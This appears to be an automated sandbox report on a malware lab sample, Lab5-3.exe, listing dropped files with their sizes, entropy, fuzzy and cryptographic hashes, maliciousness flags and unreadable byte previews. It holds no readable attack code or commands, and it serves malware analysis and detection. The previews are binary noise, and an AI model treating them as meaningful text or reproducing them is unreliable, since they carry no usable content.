                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12816
                                                                                                          Entropy (8bit):7.983877179360097
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:ldEt32yR3UwLz1SayVvF48MxKmNSAk3+UDUNK8l9qnFtb:bE3LOyJKF48qdNSAk3dUNKhFZ
                                                                                                          MD5:469914B2F50BF40F3EC13EC9AC6178B1
                                                                                                          SHA1:C0F83931B57439F75205A29A61591B75493C3A96
                                                                                                          SHA-256:9D497348BAD4BBBC8DCCC48A9851807AB87395B4EF442BB70C3535A9864FA0CA
                                                                                                          SHA-512:3D58E0ECECFFE9E051AB3B38192299EDA3EEEE618097C35B6BF81663B3567E9DE257A45BD9FAC1456CFA96684BDE28E5E55C310646DEC872A7E962891DF14AD7
                                                                                                          Malicious:false
                                                                                                          Preview:..z.._....^7.\..0.4.7.....i...z....5~.h<.-"...5.]_). ....r............j.{IQ...wdP]..i...G.xH\G1V.......$. ..m.o...."..+9.....z..+.0..8.&J..~&..O...4..\?8..uB.{6o..<.9f.y(....\...Rw...\H......D.$.P~..P."..c'.>F..Z.7.3.w.9k. E..q......,v.[..l.2.ZU.1.c8/.nc...c5.s.0]U{..Ec.......h.H...r..\i.L.....Rb......J..%.Z...l......u.t..M..9.M..eW.Wsd...F.Y.S./.T.I.]......D.on. zRII!A..Y...|......5T......?=.)..eZ.R.5.U..M+ju.. .......4..2...%K...R*R.8.8..t.....p..)..+..w..8Yd.5..b........OAC...go...*V. ./ITom}.j.%.....|......oTB.....>.B...k.FQ/.~8h...L!-..{_..w'......F.....v.|z.t..Q..../.S..?_...}%.....*2.....,.......Fm..%|\....:..3..8..h..5.@......eq..x.a.}..7^.....N}...E6.3..B.A4.*.|..o.%..k...(.*D...1(....G.d.'p4_t/.v..B.5.._..........D......{pX"&u.T.s"P=W.G..x...r...k..$..k!F>...8X..&(a,...lRk...7..W.;..."......m.n.>.L..;. .9Q.J&.\./..H...V.w...&...p.Z.^.e...}...K.I.D..f.......6.}...i...{B...r..Zm....<.;I+2v.*0....6.w>+...[~H.").].yL.0.....-..mH.!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32128
                                                                                                          Entropy (8bit):7.994246511259518
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:zB8/M4DU8aI9KlL1r4NRy4VYIHQ/LLCLh7AQHvzAcZ:zB8/M4DDaIG0ykYwQ/CLiQHv9Z
                                                                                                          MD5:1384158A7E78431BDA957151C6528D31
                                                                                                          SHA1:83D9EBB0B8A9B083E776259A13C86AAEBA0C77A6
                                                                                                          SHA-256:457815B18D3E7F6CE8748F12E3AA17671083A533A7263A5BD71FBEDAEA9C5214
                                                                                                          SHA-512:3EC08A49101A097CE50E1C54F450F2C2F2FE2D11975C442562B9973871EA325B01076A947EB809D33E6A1C363C84988EB51CA007CBC5573036A52C6E98F94911
                                                                                                          Malicious:true
                                                                                                          Preview:}O...Sj..Dsg..9..d...8..p3.......e...m.n.D..D..).8.;....)..c%f...R.b'...IE..?hP:....p......u^=..X.3.8.4.._Ir..5>aM|....r..,..2...-..b.9..m(.s56.....P.]."/...c"..j.@.<I0u:.XP..3....5c..Pa.6.E..!.c..:?..h..$l.j.@......b...u....}....9.g..}l.WbEO$T.t..#t...1..1m.p.\({....:.nh9J...V....>.5.g.~`^..,F..&.. Q.7...`..E.2.s..T..R...Ow.m.<|.o...;U....J8.....me,..HG_...x;..O..i...YH.Z.....$o...j.z.f..H./.....s.q.umi.....&..?4..Q.+...d........!.6.F.^..^.Q..K.x..2`A..t.0..+b?.~..q...d.fp<..%.6...5.1&A....`.]8.{7.N$..t.&.R......W.B.+t_b......=y*..o[".1:c."./..X.].[.B.....3...a=W*..u\.......p.a.I}..e.{....+.Ep..$.!...Z7.(-.}......x...lPG.. 6....E...U..G.qPi.xC.....Z?......Tdx...c_*...>...C.v.......}.2..xW.m..M..4..E..u.S9.c.Z..c......t.+6..B.>o........4.....>RK...Qbo.....f...n.l..}X.k....t'*G&...2%..&.x..a{...r.f....D.+*.....W:..lo.IO.N....-....T...hl.V..NA.....9>wN..ey.l7>..oS1.>B...'5"..$5....... -.........O7N..Z.I.E.|.}.C3.....l.Pp..r..al.U<f.z.3..F:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14080
                                                                                                          Entropy (8bit):7.988714007043797
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:8FPArisX0PvUL1J9mKTCfvLQeu4ITXFg9YsF/g/86Ctb:ePA+s88Lr9mRLi4AXa9YsC/8bZ
                                                                                                          MD5:6A7734E7A8AE7B22A08A8AF5E43BAA50
                                                                                                          SHA1:35E5A1E397835635A4A16AE063E78A40C65F9327
                                                                                                          SHA-256:6E67350195FFC4C8A5CE617064CB19FD31E12A06FCABF62A2C72B979E01C1D7A
                                                                                                          SHA-512:B40699D24F1E576F34E97436B02BCDCDB4CBE20E2F5D9BDED7B418C113322AF997458760C568BABFDB9D0D41A55FADCC1A4FE8725F32734A4B1ACAC9A2A5823D
                                                                                                          Malicious:false
                                                                                                          Preview:D.Q...j.p.@.(.m....(9..V..nJ.@b..#1...ArB._CU..G..A=a.u<......E..c."k..?..l@Z.`..-...........]~....y#...^y.acvTa.. ..9i..I.C8m...6BL.D........!.K.W.....t..6..+.{&.?.(.....v.u.|.a[.(-..8...3...'...[.U.Bm..K....K^....|.!G...H.<c.N..h.V.R....>...}....^j....:..F...mI.._..".@..\./.(T...Q.h\..]...e..;.'...<Ls.i. ..b.[..[.(....UfD..d.....z..3....lq.w...b..uh....(kh-...f..;.T..U>..........|..i...I.*...[.c.._..l'.....m_GO.o.S.....-.....0...k..9..Z.evA.%.).}.7.`....M...=.b""{./....S.5.Om..M..Z...0..0.KxeT..|....6.....{Bpi].9H.rGyi.s#.w..p..}.jwh.J...9S..d..F.W.(...#...NiP.Og=..g.=.....Y..G..X....hEv..........s.h.....J......+..=l.V.Q.p%.U..R.y).<.......g.0..$......$.G.i+...H...lx.'..G.q.C.H.B3e..N`~.F.w;.\.E...%q.`@C9pW....P.2%n:...=o~.....C.u...VR.9.......J.....f...\.Y...}.......o.|.'....l...J2\!....>y..o4.{z.s.z.w.9.V.D......BA?.n..o..q...|.....6.a.....Lv.v%..a.{....p..G.1..n.(....t2.....#.#..f..=.q....F.......b.m..B.......NR..?T.R....`p....CR.`.^#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12848
                                                                                                          Entropy (8bit):7.986048831826839
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:cHkxsr//MTaOYJ6AElR2GXBmJ4skCBOXtb:a/MZpAyd4JxOXZ
                                                                                                          MD5:9D366EA0B678664FB0523ECCD28E1784
                                                                                                          SHA1:7CB89B162BA7D250A4206D8BD02557C3FF5D2769
                                                                                                          SHA-256:C7DD53318B6E1A0E7FAEC94EF8C9A3D9377099E7C2F021F9B6F077B3DC224ED3
                                                                                                          SHA-512:7C2E84495D2335125DA2D3AF71E69314E1B9D809A648D6250758B2017A6E26912C8933BDCFAF83BF894979B06254ECB5AB3CAABFA837EBCC845833F4E1D5C9CC
                                                                                                          Malicious:false
                                                                                                          Preview:..p.H"".&B.M.....m.?m2....$.........k2.^...H.)....l..Q. ..+....3,....1....V.6.......j.......s.[)R.....Q...G.....G.jr..nN..c+G.-.:.=.F..:F....~.."....)...3x-.3..../!..pw3.).]..$2..9...'czI@.f.......M.]..n..........}..5W.G)...i.,.$.k....34.p.J)..V<;.......hOC.D.!&.f......]a....^%m.3I..P<?Vw...iD...;E.*.c.|.[,.n.......U.x.k..<`....N.%y..0..J#.7.......T...I...Q?.N@..g.}......&.g.e.e.|&....xMZ.g.|..8.1.+z,.y.B.g.%.U.6m.!..*9.q=..>..'.E..-LX..i...!..)[f...z9<=.!..O...~.H.\..-.W.7.....l8K..R.z..Y,E..%F..C.........6r.GP.A.t./..A1X."..se....m=r.*Y..Z.V..4.Ms.......9........\h.F`.9.E~u).W5...d.,+.T...u.x.0..-."!.[.}.'w....8...s.o.^o=..S$.2X......s.5....`/.|..lM.\.^.U/..>i.H.:..V..wl|..g.....i.]....e......}..0....;c.7......L....... ..q..h.]v...sFe.`...T.d3.~.8....]S......,X..V.ot.c.py;r.Q/@G..I........4,......./.Wc(..........?\....m.S....X@....-a......$..q>...;w.(.VudDj.V../D8.`%}..An..jM.*f%...Ao.<?.)q>E....@E"..`....IP..q.yqx...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35440
                                                                                                          Entropy (8bit):7.995130756905754
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:OQ0bZvVdTIvm0crG4rFG7Q/B3iX73n8/RaPPjLICBKiK98mQuVzyYZ:diLLr5rzJ3iLEaXj8CnRSyYZ
                                                                                                          MD5:B0C3123F51CF9A1243FA44353159AFA1
                                                                                                          SHA1:63045040BCBCB52118A91DD59E86ED8B496E180D
                                                                                                          SHA-256:17FAB157E2B63B9EDE71E40208A619B4311BB697AC7570A6C7360C48A686F13E
                                                                                                          SHA-512:DE47E59CD743A8AD24B2E1CEB87E73B071C61127E5E52DA434CE134BACD13C13DAE422531E34D77F54D98A568CFBB5CD2B08B29CE0D393B3554396E68468B635
                                                                                                          Malicious:true
                                                                                                          Preview:.^{.cd.3...&I)....s...xY.=.1m.......$.2.?A.OM>`l.5.U........FA....).....L.H..4.0.c.1.`.zKu.]..$Gc .f...p#6......-.V...,..<...gCfO.Q....xD.....r.d;*"U..J..\...o....y..............AX.l...i......PG"....V....0V.....H%...d.....p`..P6....^..*......j.........z+.8..F.T..BU...C..n_o`|o8.0....~.L..]C.NQ..LX.../..Z....L.0..!e?...N........wdV.8[`xD..53..q......#..x3...1h.M..b..3..{.( ...^...p5..(.......Y......C..$..8~.?|..m..G..}W.Vd..t.....;....M.P....4.H.Y.4..+S=..$%..C.VtQ7...n,..8>r.X_D........^.u=...i...S...zpQ=5,..y.yMY1.a...I.0..&....!...7.r.)...@...9..o..nw..Y..ur.H,$.O....4.C.5.>}.0.R.......,~...).x.zh\".[...m."qB.iN...c`.H.`v..R..S..y....j&....)...iT-9.]y.....d.y.pk.I......0uHp....a..p.M....G....T...+....6...[<.}W..T..zzG..S....7...v.,&^.....k...d~..k..7..Kj...lu..=;...JWY.b.....i.i.F.Z^..k.....4.F.....ou...t..V^.t@.]..Pj.tk....(..{...u..g.v=?...............d....~.....H.>`.......e..\y\..P.... =.l...l..B.B....*,.@W.......ulg'..1l.~0..3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10384
                                                                                                          Entropy (8bit):7.981908856609625
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:QmyldartzjKhoHuzv55t8eR4e4Um2l4V9foc9/uYFYUss4UW0wbs4o0Cb:QARsoHu7X714UmHV9QC2oJwDotb
                                                                                                          MD5:78AC6631EA4B42C0E56799E09F21DFE2
                                                                                                          SHA1:10571E85448DDEC46765C8C415590931D1AE0C1C
                                                                                                          SHA-256:BD36E7749CBBB11054645617859FA9FBA364D75A0732A2259E9A62FF4EFA2CEE
                                                                                                          SHA-512:8F3423A2E0D32792CBF89F9F3B9C72B497467BFDCA73A2FE3FD3CD49A457CEB704C9257B1E7FE374E01B1B15E7E6BEBCFD6277A109CAC7639B67698B6F7C7DCB
                                                                                                          Malicious:false
                                                                                                          Preview:=F!..A<...4#i)..]..0nv.M...$(..'.......1g.<...!*..p ....+.{..3Fg.....=.N[.~./.... 82.<7.....^...}!..9Ul.kI..D.-.....l'..j'.......Kt.?.W...............u).......=K........D;E.[.k)SS.]..}<...h~s(...z..+I.}.d.w........7.v......W.....~......d....*.\..R.......>./..n.NK.t.*...c;.l..eX.P....L}..."e.G\."..Y.'~.i&ay...T=.;.?r..vi(.c\.Vz..R5.kB...{.V.....0e$..y>...3(....Ms.5gnr..Yp...<.....;....:...Q..5vXB..).\.U.f.cy8rp..4.K....cw.o....(Oq.*...ny....r....b...,4a....7L..vl..L./.u...f..O.V........7..c.C.|..I.4.%...k./..r[....~}...V.%.h.s.\.YH~.6...ek.<...~k{.oh...e.Ow...q...M`..H.....[-oye...r..5...F.....i..............j^.-...5f............c.V.?X.A~.+..G.....%N.Lw...6tQ.....z....w3.H-....vW7.Y`.V...E5zU.l<&LDH-.5..d...w..v)....N.l..SQ1..qc.$......a..X..Z...RZ]...n./..~..ENN.......U[..i..-E..5I.0..F.........@.d%...D......".>RDo.W@...E.i:.1.s..>5......^.A[................@........Y9...^.|$.......".v}...z.N.........I........X.=.\S....z..^.i.....>G.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12256
                                                                                                          Entropy (8bit):7.983810783308479
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:UOLKr0A7HddfAMwvcOHUK95IAF48aD2km3WXGICJQt3CigoBQ+dY7vyFwnB0Cb:NOrz7HPfAMw4Kjr48n3dPJQSmBQ+dYOY
                                                                                                          MD5:5639D7A1A87C035C5EC9992384FED3C6
                                                                                                          SHA1:CBD624B634DBCB3480B37BC5483FA4A1ACF2DF79
                                                                                                          SHA-256:0CAD4ED0D6C9E26321BCA66A274BBFCD50F6F3C43F23DEDB8D7905C5A1658649
                                                                                                          SHA-512:6D77981A3CE0DD2BE9A3C592D661BE7CB0045BEACB6AC654BBD99647602CD58FA86B42D8CA945C89824E0E7B80AFF312F93E9715B33BE015574AE194E412DF81
                                                                                                          Malicious:false
                                                                                                          Preview:.&.K*dw.O.0......V..S..`.,...R...&..=...8..X.|4.%..1..Q:.?.HJ...:....'..EHsbT......`*JGpS..z...x.....i..1.....h..Y.^.iW5..aC.x.=....$E.7Z..5(V.q.5........\.[37...+.<)D#.DV6.L5Z..)......Aw..%.w9.F.}...3..Z...#7....{K..Go%.Pi.... .X.B{.w.d...Pp..H<O..9.k.....&..n....hd.v.V.<^W..4.Iv0...&.0..7.7..O.......@*bX..MM...y.s>.....?..)Sg.......G.h.e.lo......P..T....1.......h.X.....:.......t....-...d^.Z..W.....-.om.6{.V..z........aOl...!WF..qv..\..J.3....t..pk.:..z...U.0...M.D."U>.2...g.MT....i.!..zF.o6...4...y._.....[<..UrF&-..a.....".`.r.,v.k2.C..Jh.......g|.`kg..V....c.....+.#.a3.{Xsb...z._f.).........&l,?...>.29......q........i...@....J|.....))...b..N..61...>..,.........$....ud......w.<....X..].M5s.k....v.c....e..V.o...N.o..o.l.........g._6.U..&.K`.v.P.....hn....... ......t.J..S...s.....Z1.ZK...5>.,?>.p,.ZO.i@...T.%Xpi.P............2.Of.[;.Z..+..tkH.K.7......#.j.N.e.Y....v*[...L.L..F6....F......-<Q.....A........tt@...A....l....r..........q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12208
                                                                                                          Entropy (8bit):7.985053520562655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:mXlsg1qHriDp1LpW8OvOPLFEwWhFjnfkC00M/30Hj370Cb:Lg8HErFzwBsL0MsD37tb
                                                                                                          MD5:9C039462A2BA35F65FDBB40DAAFA8D66
                                                                                                          SHA1:826F01595918EF33660F5320DE99C71A8A10F15E
                                                                                                          SHA-256:2B2B646FDCC3470592E78B6369F3CCF02A14FDF88BAD85657010FE662EACA568
                                                                                                          SHA-512:195A07B69C0A800F6C7F41D5FA429EEB590C6A386A994C5DF9A171DD7745A055A666F4A2B92407E8D83D02AB55D1F266F656A5E95CCF136C41B3A70D123C1562
                                                                                                          Malicious:false
                                                                                                          Preview:;..(~F'$a..x.z.N...9....t.. ......Z.Lg....?..cw..L....].._5L...........I...qv ;SI..#.....+|\.W."QL......d.....y...bV\../...|....b.T_.BHr...1.Z.........]7.+......D6.cx.S.s......v..xK..rJr..Qg..,...X..7.6.)uyN.S`$..O.SR..]f.My...N..g...p.AZI.q+...VF3{.hR.e..t....R.A..j..}.`%..K.g...@.......l0..R....%(..|...1..pq.>...t..~...P.".....'.~.o.U.^...`.....7...n...`qIN...62.y.....m.6p.c.g.]....M.o.. N..o"......3.O.+.q.d}k...@.H.-|.+Yy.....&g.8....m....u...pgh..rm{.lr....Q2n...y...&..I.a...m`.......t}4.V....h..I..<..na.v.<.~-C.......En.x...L....t..ML3x.:%.."..5..%.......Ue.c......%.X#8.n....VQm.Q.%s.'..?.Vh-1.]...."..l.....]..BQ..c.+N#.I9*zd........Z.Mwm.oF.CF/{%..o..../K.x...h...x..^........E..^...Y..n..8...~].BX..D.Kb.....K_C.D(...Ma....$...aM.....U"75...t"..?.DOe.........3.].<v...JT....bu7.$.%...L.A..Ud..O..U."[....v..?.>.....a....D...U^.[.bhH....V....M.sd.0p.....~..U..I.4rq&.%.Z^...........w...txb~b&..D..$......>O:.'t....W.r..~.._../.S
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17024
                                                                                                          Entropy (8bit):7.98903042484705
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:ah/dAmAwl1k3oxIbNaMSgV9ejZy6YJZwPIAqTKOLtb:ah/Lf1rxIbNygDejUJyPBqTNZ
                                                                                                          MD5:19D4CB1E6AA5143BD46761C84B78A93C
                                                                                                          SHA1:9727C8F15DD585401B3AF96FBC60FDB75719D732
                                                                                                          SHA-256:900B8BF586D313AC4B4B620F0071F1E1E98C0F543D3058CC55E691637D889B01
                                                                                                          SHA-512:8FCE80FEB9724054295E231615E6240D78819DCB89874449827C30A68A2CEA7D44EDD596A496003ED35F988DBED867F5318DFFD5220D3BA383F9F43FFFD4780A
                                                                                                          Malicious:false
                                                                                                          Preview:...Z.N..!0jw.uY......&......=,....W.!v..".{u...x...[:%..p......U8.x....QO.:6....}......\.WP.T..u.N.)...n.<...~1....m.'.>.,=.d.x"A...?...B.o.........A^....`.... =...k..A.1...j.P.#..&.t.@..Flo.Av...5....'.....}.q......Rx.:.............zl.#...#..]|....f..Z.Q.";..z4^..o}.....Z.}.....#.....[.....5e...R.@:2...............z8.!@(.%epL..^.$.Zns.....J..fp#.e.R|O.o.c:\f)1........p.....;...MV.e....TN..JR.,....%.v..1N...,8..}..-....n.%.HY..M.}...oM.I... #.p.H.k....kh...|.kJn.g.b...k..5......!.,.wZ...01...Gp.E...=[a...s[.f......Y...MINo*.X...)&a... .+^.0.e...|...oQ...q.....r....b._..C.yoN1"V..h.F.#a.p..).H.&.$..l<k'.....%.Qv.n..{eY#b..........}arq%k-5..-..]@..B.[..I........u..^.!.>&.1.ET..,.n./-....0D..]!3...%..u...I....i........op..+z.I...z.g..~b..:.."im.}..8..iP&wr......v...^....Ul..&e...{...k.@H.&.).N.dE..T..k....Y.....6).#....A.V...U..:.."\..Jy......~@.uX,\9.m......8....'.....m......Iv:;..M]E..C. d(...z.a.p"..t..w.TW0)....mj.'>.{......Xy...r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12688
                                                                                                          Entropy (8bit):7.985496130805207
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:UqzrSt0lYCrQaBli1DiUw5NxP3KFsltXltb:UO2tsYCMh1MjsFslXZ
                                                                                                          MD5:C01AD3B41DA44A567C5403F6E0551C87
                                                                                                          SHA1:4EE003CFD2A491263F9D7531A59BE93AC576F5FD
                                                                                                          SHA-256:BE4D7E4616DB1E5DEE214A54EAC7A827103D9FD135D0F28942D6074A2D946261
                                                                                                          SHA-512:F3DA9B6ECCAABDB1619CA21E3D7A9BA8903153F8A64ABF6F699C052C9A662E546329A9718DF84FFF18E65A668B0972A2C2BE9FB1DAFF13E0D354557CFB25BF89
                                                                                                          Malicious:false
                                                                                                          Preview:C...0.y .?.............jD.&...}k`._lS...N.~s.(Y...z.....A.....\I*......\...Q.......9.......;.~k._..J\...y.`..c...8[..`.u.9.....!...U...w.n....C....}ktQ.R.`.A..j._..j/UH]...d..|h&k..4{K.)....\..h.....UG.....Jk..$L.....f...D..G......?*]z;..%...(...Jfv0.p..d.......?v..b.n......w.......j2.....Y.W.Y\C.4.a..4.W...`.)ud&..'R...c...(....!.k~7.....tNC.).dIo..*...zJs.s.....5... .>.:......i..D^...7...i...AA.\..9.?.....o..-'..0.N.E.U......I..fl....7.c.O9|hW....zau.\..U^B(...}.......?....F.~.s....._.F...3.$..PI.na.*FR.?aw.mA:.S6...v...2]!..I.%.e..vE...........f...L:...8..tT.x....3E...no:.v4...+..n.l#.mu.....".i_..<.W]F.8<3.R%..*6.u...kPM..?...DB}Q..0+...y:..J..h......8.P0..y.*........r.R......9K`........].o....g.Nr.U..5.{MQ8'&..*X..1k%.d.\..A.......#`..?>3J...x@.Mz...S...+.:...=E{P.<........J......6>.ch..Ct..z.[\.p..G5?.._-.K..\..l..p.H....5.........KYy;..-} ..{.}.'M.z..p.....?.C.Co.~.L..i..of....5.4i...O...2.......G.*&.....,G..F@.&o..I.jf..F'...OB...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12640
                                                                                                          Entropy (8bit):7.984886614496208
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:efiFW/cbHT0QXT9NnM4t0JHCrxQmxbmuesCTzHIhcPK6voZIReFg81z/RA0Cb:uiFWK7ErJHCdRxreHj1PK6vDkCGAtb
                                                                                                          MD5:AF0712CB4AB255AF9866A12508801E24
                                                                                                          SHA1:78024D1BC4B7CF42EB90E6EF81A7BF955E1436EB
                                                                                                          SHA-256:90473E587BC66C320FE1DC21EA116A50BB0F202BA3E6101F5C0DD54AAA8E2DCD
                                                                                                          SHA-512:D5B0F5DF7CE3C633C76DF06B3B0F47EE314F052B0E010D9682B14E772AC56AC3FD56721CA4B4714ECC63E82EE7AF3FBCC98A82A12F55623A5B9B069B0D101A6A
                                                                                                          Malicious:false
                                                                                                          Preview:........U5....FS...He.0UO..m;./.O....Y.Z....pn."MMe..=.g......Q3...3.......f.........-..n...2.8j..~ l.........e.y..*v8..[.....F.5.z..(FRr%.Cv...!..1...R.WU.=u-...#..lJ.Q......!.....jV.-9..^.9......\......k...-..9.,.G3.%=.uQ....5.D#..(.%{;OG..O.!D........_}....y..Y.gJC....v9..~.| .o.it.7.ND..)..... ..j.Y."M...4...FU.*e.....4@...........(I..9;@...../....!4@..=..a9.2.^...6._.q....Hz.$..x.(v.6U|.wB../.....Cz%.q..m....s..EA.b}j.g...O....U..C.......M9]@%..NJ...........c. ...}....m.......!..jK....@g#.1......b......}...W....'..&.....B..`...7I.~%.e}.S..(uNg.........D.?..1..E.s..(G{"....^.:V.@b.r...2....R.....l...,..b.k.....D<.3.S..3+U#....%.P.:....q[..vj.T..#....Nf...........)"~...}..xf.......T..WY,...(.M.n.x.A...'.ca.....Z./...)...b...UE.,...0*v........).8.....rA2.t.oMw......&,......(_...v.N...Ey......8.(.7.fbYqZ.."v.@..Fy...#.`{3'........d.\).zg....oU..........x....V.Q.1.<..k...5.!......4.. ....3.......@gBo!..Y....LKO...........$.c.)Q.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2624
                                                                                                          Entropy (8bit):7.931844988451438
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nX59AsuuYjq9gC2FfHS7MW5tBHfUTid3hBaUoSGFcmeykEdEElU92i:X59zJx2F69+Gx0uKeY2ElUJ
                                                                                                          MD5:649258A28955781FB0704CF6BF36868F
                                                                                                          SHA1:6680219F6FE1457089F97EBD367B457077BC1F4A
                                                                                                          SHA-256:A3B008B6FA5BD037C231055FF571839C500E446BD93424DE0EF27311A3A1FF59
                                                                                                          SHA-512:8E16386978839AC7D4CD655C03AE8B2CB09B963287923DF10127C4F39655A1AC33C445AD25EEF685B80E883C6773EBE0F7663C15B0CAD5FA42E4A89AE9FD1D8B
                                                                                                          Malicious:false
                                                                                                          Preview:.V.....F.k..gu....q..."...#u.#.(....;... ...No\%....2Cx.m."...]..?..q.5..EZ..g...g~`.u.9..w...........*G.8C...xEg.f+n..E..y.V.~..r..s....]t....N.m'......e..&....$&..P..._9.u...j:d{!.b.R_.T....]4.4..o.)..6.b../.....Ea.3E.A.K...^N[9T..O|..b...L.>...dH.$S.$......LF...a.q..`.....vQ..w%......c...O...d.-..2.........#..*..."..o........2.p0.....0.*"..12.p#........y...N...X.9F.vY'....I..z.........*.wR...8....l-.T...<-.L..Kl>....T/......I&.A<....~.OM. R%A..J...8....V.B.p......g...].uW"...GCA...-!.........ST..4n.)R.w.N.1.....x...l.d..o.........D.....!H.\N...Nh.....>.3..x.E..N..}gw.....E>J.J.=.x...<}a..$...{y).`Tl...R!M...RK..9].XN...[.`/*[......&...9.........<bW.Q.N.s.{..UX.oh $a.......C.J..:E....g.@..!=..A.`.:....d...zO.=.O.<I.....c^..;....x.._D.....l8..Lq..A.........q.7..#.@.L.-..4..j-...w%..B.........%.M..{..!=3.9d+.6-...k.J.....f.P..&.H.6..J..._I.w.........h....c.QZ1...D....<..}.{.AEEL.VDy.rF..o...79@L..xL......@?...f.P^..^....5d~.,T...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12448
                                                                                                          Entropy (8bit):7.981693934747335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:/Nk1tYPImVipwyGE/aGtr+vz3EFYv//43c5yBa/NVTwj0Cb:61tYHVipwAj4zUFYH/D5y4/HTwjtb
                                                                                                          MD5:5358253F0DF65CF890F2871FEB680B86
                                                                                                          SHA1:2319891DB93D0AA45280761A1E3A6454FA694459
                                                                                                          SHA-256:B9084674430A97F4910E7AE6A905FF4B18D1218B85AF81DCE1A54023E1107F31
                                                                                                          SHA-512:68B74B76B2A677966F802A628F875AA4D676B02ECA3023D54B4D34D87E9CE73209D2BA84AB7935B58C040F08F4794027CF320226AE5F3B8F6177862A7E841E5F
                                                                                                          Malicious:false
                                                                                                          Preview:.~..m...w..<B...\.cQ.....B...m"....;f...6..z<...+..'.....oJ..[Ai..5l...>c..R.B............+..w>..C.$3E..-.W.k.2y...*YK......[>r.........Fr...s...C$..u*.*..*:P.!qlc..........Eg..(.=X.....;5....r{P....'QK.).~.mR\..1.....G...N....N...)......A....4........)l8....W..v..3t..1...D...>....O ..cU/....H..kD..S....l..q...>....4.........j!.0..j:p...o............\.....E..r..!.9..U^w(.v4.'...s...].Z.&m.&v.<d.T=...a\.)...~-..........v~.A3\FW...V....8.....C..8...../.l.....4...6.|....*...F.Q....979TD..?GS..2g.....5.?UM.+....d..0....8a.0v..`.NO...:<..(\........:.A5..].{q....'+....)8...DV...\.{.....*.{%.t\..x.j....O.......z.{T4..w.'E...*.Q...f.......`H..~...@z.b..)=..N{?..3....]...e..Vf8....l.h@.E......Rj..{S.....b..3...el...+.O&P..e.l.rL.. .....C..'i..x........I=.lf..p..J.......a .V.E.3.W.....o...z.Z.T.RL.c...V..t.,.m.p.G.,AoB.N!5.z...@WNx....p...Y..W.....:B.5.$.....5.......g..@G.^.gg..=.U........._$...H.......E..K..@9.|O2|.DD..l_.?.^C..b(....}...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12208
                                                                                                          Entropy (8bit):7.98396401081394
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:N5/UyTsgA3OX9yGC3PK/039IlvZjt9m6fQglbsjmODaiahiBLW/DzkMgeEQcI0Cb:D8yTvkOXsYKmlvpvm6IghsCmaAM7zXgM
                                                                                                          MD5:E403A484A784A58DB7F4162AEC03C4C7
                                                                                                          SHA1:D32684FF81A15214DBE5C6E851E891998002E15F
                                                                                                          SHA-256:6815CE0DAD657CB8BA84D84B9D5629B59E00C6E14874CECCF6501B898F267172
                                                                                                          SHA-512:B43DC76B9D00F2DDD1B45444541414D6E5746BEAE597F603DDB3F74FFBF06BD4A4B0A852403381E25E266E6C3212D03025186F05C66D5DF491A5955777233791
                                                                                                          Malicious:false
